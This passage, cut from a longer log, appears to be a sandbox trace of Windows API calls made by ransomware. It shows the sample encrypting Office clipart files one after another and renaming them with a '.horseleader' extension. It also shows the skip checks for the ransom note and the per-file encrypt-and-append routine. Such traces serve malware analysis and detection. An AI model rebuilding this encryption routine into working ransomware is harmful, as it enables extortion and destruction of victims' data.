Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.horseleader")) returned 1 [0253.423] GetProcessHeap () returned 0x780000 [0253.423] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.423] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81632800, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81632800, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f86, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00195_.WMF", cAlternateFileName="")) returned 1 [0253.423] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="Windows") returned -1 [0253.423] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0253.423] StrStrIW (lpFirst="BL00195_.WMF", lpSrch=".horseleader") returned 0x0 [0253.423] lstrcmpW (lpString1="BL00195_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.423] lstrcmpW (lpString1="BL00195_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.423] lstrlenW (lpString=".testttjffg") returned 11 [0253.423] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.423] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.423] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.424] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0253.424] StrStrW (lpFirst="BL00195_.WMF", lpSrch=".txt") returned 0x0 [0253.424] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8070) returned 1 [0253.425] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f86, lpOverlapped=0x0) returned 1 [0253.426] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe07a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.426] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f86, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f86, lpOverlapped=0x0) returned 1 [0253.427] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.427] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.427] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.427] CloseHandle 
(hObject=0x158) returned 1 [0253.427] GetProcessHeap () returned 0x780000 [0253.427] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.427] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.horseleader") returned 79 [0253.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.horseleader")) returned 1 [0253.428] GetProcessHeap () returned 0x780000 [0253.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.428] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81891500, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81891500, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00234_.WMF", cAlternateFileName="")) returned 1 [0253.428] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="Windows") returned -1 [0253.428] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0253.428] StrStrIW (lpFirst="BL00234_.WMF", lpSrch=".horseleader") returned 0x0 [0253.428] lstrcmpW (lpString1="BL00234_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.428] lstrcmpW (lpString1="BL00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.428] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.428] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0253.429] StrStrW (lpFirst="BL00234_.WMF", lpSrch=".txt") returned 0x0 [0253.429] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9304) returned 1 [0253.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2458, lpOverlapped=0x0) returned 1 [0253.431] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdba8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.431] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2458, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2458, lpOverlapped=0x0) returned 1 [0253.431] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.431] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.431] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.431] CloseHandle (hObject=0x158) returned 1 [0253.432] GetProcessHeap () returned 0x780000 [0253.432] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.432] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.horseleader") returned 79 [0253.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.horseleader")) returned 1 [0253.436] GetProcessHeap () returned 0x780000 [0253.436] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.436] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9438d00, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9438d00, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00242_.WMF", cAlternateFileName="")) returned 1 [0253.436] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="Windows") returned -1 [0253.436] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0253.436] StrStrIW (lpFirst="BL00242_.WMF", lpSrch=".horseleader") returned 0x0 [0253.436] lstrcmpW (lpString1="BL00242_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.436] lstrcmpW (lpString1="BL00242_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.436] lstrlenW (lpString=".testttjffg") returned 11 [0253.436] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.436] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.436] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.437] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0253.437] StrStrW (lpFirst="BL00242_.WMF", lpSrch=".txt") returned 0x0 [0253.437] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4024) returned 1 [0253.437] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xfb8, lpOverlapped=0x0) returned 1 [0253.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff048, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.439] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xfb8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xfb8, lpOverlapped=0x0) returned 1 [0253.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.439] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.440] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.440] CloseHandle (hObject=0x158) returned 1 [0253.440] GetProcessHeap () returned 0x780000 [0253.440] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.440] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.horseleader") returned 79 [0253.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.horseleader")) returned 1 [0253.441] GetProcessHeap () returned 0x780000 [0253.441] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.441] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5124300, 
ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5124300, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x386c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00247_.WMF", cAlternateFileName="")) returned 1 [0253.441] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="Windows") returned -1 [0253.441] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0253.441] StrStrIW (lpFirst="BL00247_.WMF", lpSrch=".horseleader") returned 0x0 [0253.441] lstrcmpW (lpString1="BL00247_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.442] lstrcmpW (lpString1="BL00247_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.442] lstrlenW (lpString=".testttjffg") returned 11 [0253.442] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.442] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.442] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.442] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0253.443] StrStrW (lpFirst="BL00247_.WMF", lpSrch=".txt") returned 0x0 [0253.443] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14444) returned 1 [0253.443] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x386c, lpOverlapped=0x0) returned 1 [0253.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc794, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x386c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x386c, lpOverlapped=0x0) returned 1 [0253.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.446] CloseHandle (hObject=0x158) returned 1 [0253.446] GetProcessHeap () returned 0x780000 [0253.446] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.horseleader") returned 79 [0253.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BL00247_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.horseleader")) returned 1 [0253.447] GetProcessHeap () returned 0x780000 [0253.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.447] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9eb00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9b9eb00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00248_.WMF", cAlternateFileName="")) returned 1 [0253.447] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="Windows") returned -1 [0253.447] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0253.447] StrStrIW (lpFirst="BL00248_.WMF", lpSrch=".horseleader") returned 0x0 [0253.447] lstrcmpW (lpString1="BL00248_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.447] lstrcmpW (lpString1="BL00248_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.447] lstrlenW (lpString=".testttjffg") returned 11 [0253.447] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.447] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.447] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0253.448] StrStrW (lpFirst="BL00248_.WMF", lpSrch=".txt") returned 0x0 [0253.448] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1536) returned 1 [0253.448] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0253.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0253.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.463] CloseHandle (hObject=0x158) returned 1 [0253.463] GetProcessHeap () returned 0x780000 [0253.463] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.464] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.horseleader") returned 79 [0253.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.horseleader")) returned 1 [0253.465] GetProcessHeap () returned 0x780000 [0253.465] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.465] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b67a200, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b67a200, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00252_.WMF", cAlternateFileName="")) returned 1 [0253.465] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="Windows") returned -1 [0253.465] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0253.465] StrStrIW (lpFirst="BL00252_.WMF", lpSrch=".horseleader") returned 0x0 [0253.465] lstrcmpW (lpString1="BL00252_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.465] lstrcmpW (lpString1="BL00252_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.465] lstrlenW (lpString=".testttjffg") returned 11 [0253.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF", lpSrch=".testttjffg") returned 0x0 
[0253.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.465] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0253.466] StrStrW 